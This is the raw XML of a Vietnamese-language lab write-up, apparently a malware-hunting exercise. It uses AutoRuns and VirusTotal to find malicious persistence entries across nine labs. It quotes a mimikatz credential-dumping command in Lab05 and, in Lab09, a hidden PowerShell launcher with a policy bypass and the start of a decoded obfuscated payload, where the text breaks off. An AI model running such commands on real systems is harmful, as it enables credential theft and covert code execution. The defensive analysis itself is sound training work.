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D6D62" w14:textId="63BB2083" w:rsidR="00AC73D6" w:rsidRDefault="00F72F23">
      <w:r>
        <w:t>Lab01:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2036146A" w14:textId="7F7D1C3F" w:rsidR="00F72F23" w:rsidRDefault="00F72F23">
      <w:r>
        <w:t>Ngay khi vừa vào, ta nhận được thông báo system lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D8F0C6" w14:textId="52DEFFA9" w:rsidR="00F72F23" w:rsidRDefault="00F72F23">
      <w:r w:rsidRPr="00F72F23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5002CF55" wp14:editId="193D614C">
            <wp:extent cx="5811061" cy="2848373"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8781213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21356" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5811061" cy="2848373"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE5B3F" w14:textId="21D7C9F2" w:rsidR="00F72F23" w:rsidRDefault="00F72F23">
      <w:r>
        <w:t>Vậy nên ta sẽ dùng autorun để kiểm tra xem trong lúc start thì hệ thống sẽ có những chương trình nào được khởi chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7D3F29" w14:textId="5017D372" w:rsidR="00F72F23" w:rsidRDefault="00F72F23">
      <w:r w:rsidRPr="00F72F23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D178DA3" wp14:editId="59C7BCF0">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1066221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21301" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B2E194" w14:textId="4ED27C6C" w:rsidR="00F72F23" w:rsidRDefault="00F72F23">
      <w:r>
        <w:t>Vì ở đây lỗi nó liên quan đến system nên mình sẽ ưu tiên kiểm tra những chương trình có liên quan đến system. Tại đây chúng ta có thể thấy có đường dẫn “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72F23">
        <w:t>C:\Users\hunter\AppData\Roaming\ELP84P\System.exe:</w:t>
      </w:r>
      <w:r>
        <w:t>” khả nghi. Vì vậy ta sẽ lấy mã hash của nó và đi kiểm tra bằng virustotal thì cho ra kết quả sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1308D153" w14:textId="1023B863" w:rsidR="00F72F23" w:rsidRDefault="00F72F23">
      <w:r w:rsidRPr="00F72F23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456572AD" wp14:editId="022D4005">
            <wp:extent cx="5943600" cy="1551940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13485587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58799" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1551940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD1360D" w14:textId="37DCFB37" w:rsidR="00F72F23" w:rsidRDefault="00F72F23">
      <w:r w:rsidRPr="00F72F23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="339E4087" wp14:editId="1613C948">
            <wp:extent cx="5943600" cy="2599690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69306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63011" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2599690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A14FAFD" w14:textId="77777777" w:rsidR="00DA139E" w:rsidRDefault="00DA139E"/>
    <w:p w14:paraId="31660622" w14:textId="7647C91B" w:rsidR="00DA139E" w:rsidRDefault="00DA139E">
      <w:r>
        <w:t>Lab02:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499DD64E" w14:textId="7867FB2B" w:rsidR="00DA139E" w:rsidRDefault="00DA139E">
      <w:r>
        <w:t>Tương tự với lab01, chúng ta sẽ kiểm tra trên AutoRuns một lượt để kiểm tra xem có gì đáng nghi không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64662DE2" w14:textId="36091175" w:rsidR="00DA139E" w:rsidRDefault="00DA139E">
      <w:r w:rsidRPr="00DA139E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14EF77AB" wp14:editId="13FDB30B">
            <wp:extent cx="5943600" cy="3096260"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="236438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38476" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3096260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79A3ED" w14:textId="3C4FB2D9" w:rsidR="00DA139E" w:rsidRDefault="00DA139E">
      <w:r>
        <w:t>Ở ngay trong phần service chúng ta đã thấy có mục để tên WinDefend nhưng mà đường dẫn lại dẫn đến 1 file dll nào đó trong rất khả nghi. Ta cùng thử check trên virustotal thì cho ra kết quả như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260B642A" w14:textId="78C4FA68" w:rsidR="00976930" w:rsidRDefault="00976930">
      <w:r w:rsidRPr="00976930">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15960679" wp14:editId="38EB0234">
            <wp:extent cx="5830114" cy="562053"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1829875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660" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5830114" cy="562053"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A1620A" w14:textId="390852F7" w:rsidR="00DA139E" w:rsidRDefault="00DA139E">
      <w:r w:rsidRPr="00DA139E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F63B0DD" wp14:editId="42B82175">
            <wp:extent cx="5943600" cy="2598420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1831822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2149" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2598420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FF2B75" w14:textId="77777777" w:rsidR="00976930" w:rsidRDefault="00976930"/>
    <w:p w14:paraId="2349BA5D" w14:textId="36F4E294" w:rsidR="00976930" w:rsidRDefault="00976930">
      <w:r>
        <w:t>Lab03:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A79D84C" w14:textId="3DC54938" w:rsidR="00976930" w:rsidRDefault="00976930">
      <w:r>
        <w:t>Tương tự 2 lab trên, ta check trong AutoRuns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EAD4DB" w14:textId="611810EB" w:rsidR="00976930" w:rsidRDefault="00976930">
      <w:r w:rsidRPr="00976930">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="734DF48A" wp14:editId="185EF2FD">
            <wp:extent cx="5943600" cy="3131820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64147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79714" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3131820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9BAAE" w14:textId="2EC1BB44" w:rsidR="00976930" w:rsidRDefault="00976930">
      <w:r>
        <w:t>Tại phần scheduled tasks này ta thấy một app ghi là systemsound nhưng đường dẫn lại dẫn đến một cái main_backgroud.png nào đó, cùng thử kiểm tra trên virustotal thì có kết quả như sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F7A78" w14:textId="6F564072" w:rsidR="00976930" w:rsidRDefault="00976930">
      <w:r w:rsidRPr="00976930">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AF35846" wp14:editId="30AFCA93">
            <wp:extent cx="5943600" cy="606425"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="191784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43352" name="Picture 1"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="606425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD3AD3F" w14:textId="4B076F22" w:rsidR="00976930" w:rsidRDefault="00976930">
      <w:r w:rsidRPr="00976930">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="773F444A" wp14:editId="53DA7CE5">
            <wp:extent cx="5943600" cy="2553970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1066828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28941" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2553970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE25F2F" w14:textId="77777777" w:rsidR="00251026" w:rsidRDefault="00251026"/>
    <w:p w14:paraId="043A1A4E" w14:textId="491E9A7A" w:rsidR="00251026" w:rsidRDefault="00251026">
      <w:r>
        <w:t>Lab04:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C0163D" w14:textId="304A5902" w:rsidR="00251026" w:rsidRDefault="00251026">
      <w:r>
        <w:t xml:space="preserve">Kiểm tra trong AutoRuns, ta không phát hiện ra điều gì bất thường. Tuy nhiên, trong phần schedule </w:t>
      </w:r>
      <w:r w:rsidR="00CD1EFC">
        <w:t>ta thấy có lệnh cmd. Vào tasks schedule ta thấy có task window update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F61A21" w14:textId="47C8DCD9" w:rsidR="00CD1EFC" w:rsidRDefault="00CD1EFC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FCD48DF" wp14:editId="18F22796">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="147304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5978" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1CF1F3" w14:textId="00085BBA" w:rsidR="0026725D" w:rsidRDefault="0026725D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Lab05:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7F6B5" w14:textId="37941977" w:rsidR="002B7E7C" w:rsidRDefault="0026725D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy AutoRuns bằng quyền admin ta thấy được có tiến trình cmd bao gồm các lệnh: </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>cmd.exe /C "OIS.EXE" log privilege::debug sekurlsa::logonpasswords exit</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>. Đây là lệnh của mimikatz để thực hiện lấy các mật khẩu trên máy tính hiện tại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4369B423" w14:textId="77777777" w:rsidR="002B7E7C" w:rsidRDefault="002B7E7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62809844" w14:textId="3FA63B90" w:rsidR="002B7E7C" w:rsidRDefault="002B7E7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab06:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A060E6" w14:textId="4E6C7735" w:rsidR="000C40AF" w:rsidRDefault="002B7E7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy AutoRuns quyền admin ta có thể thấy ngay được tiến trình </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>trnsrun.exe</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> không được verify</w:t>
      </w:r>
      <w:r w:rsidR="000C40AF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tại “</w:t>
      </w:r>
      <w:r w:rsidR="000C40AF" w:rsidRPr="000C40AF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>C:\Windows\SysWOW64\trnsrun.exe</w:t>
      </w:r>
      <w:r w:rsidR="000C40AF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134814C" w14:textId="77777777" w:rsidR="00480AC2" w:rsidRDefault="00480AC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13680163" w14:textId="3562BC4D" w:rsidR="00BC2DAF" w:rsidRDefault="00BC2DAF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Lab07:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02C03F" w14:textId="57452C0C" w:rsidR="00BC2DAF" w:rsidRDefault="00BC2DAF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Dùng AutoRuns quyền admin ta thấy được dll tại “</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2DAF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>C:\Users\Gee\AppData\Roaming\Microsoft\Windows\OUTLLIB.DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>” không được verify. Kiểm tra trên virustotal thì đã được các bên uy tín như AVG, Google hay là chính Microsoft duyệt là ko an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06241839" w14:textId="77777777" w:rsidR="00992526" w:rsidRDefault="00992526">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390095CE" w14:textId="667FDA7F" w:rsidR="00EC4F29" w:rsidRDefault="00EC4F29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab08: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04BB81" w14:textId="3329C7FC" w:rsidR="00EC4F29" w:rsidRDefault="00EC4F29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Dùng AutoRuns kiểm tra ta thấy được file McAfee ko ở đúng đường dẫn (ở Program Data</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F38">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cụ thể là “</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F38" w:rsidRPr="00DA5F38">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>C:\ProgramData\McAfee</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F38">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> thay vì ProgramFile như các exe khác). Ta truy cập vào đường dẫn và kiểm tra lần lượt các file trong đó thì phát hiện ra </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>MCUtil.dll</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00DA5F38">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> là file mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12515B2E" w14:textId="1B1EF8EE" w:rsidR="00DA5F38" w:rsidRDefault="00DA5F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab09:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FAB56" w14:textId="1F519CA2" w:rsidR="00DA5F38" w:rsidRDefault="00575176">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Ta có thể thấy trong AutoRuns, có tồn tại chương trình powershell chạy lệnh như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E0B41" w14:textId="11AD566F" w:rsidR="00575176" w:rsidRPr="00575176" w:rsidRDefault="00575176">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Cambria Math"/>
            </w:rPr>
            <m:t>-ExecutionPolicy Bypass -file C:\ProgramData\Microsoft\install.ps1 -WindowStyle Hidden</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="1EAD07B6" w14:textId="77777777" w:rsidR="00575176" w:rsidRDefault="00575176">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353BF247" w14:textId="70619ACD" w:rsidR="00575176" w:rsidRDefault="00575176">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>Trong file install.ps1 ta thấy đoạn lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25794587" w14:textId="764070C0" w:rsidR="00575176" w:rsidRDefault="00575176">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00575176">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>powershell -w hidden -enco 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B049D73" w14:textId="17D9A99C" w:rsidR="00575176" w:rsidRDefault="00575176">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>sau khi decode và xóa đi các kí tự thừa thì ta có thể thấy đoạn lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3770B3CC" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>$Eaqekqdr='Rdihyhokr';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AE6CCD" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$Qlidsvmgx='697';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3390F08E" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E02">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>$Zekpiwafigy='Bznpimsdzhz';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6949A2" w14:textId="77777777" w:rsidR="00D27E02" w:rsidRPr="00D27E02" w:rsidRDefault="00D27E02" w:rsidP="00D27E02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
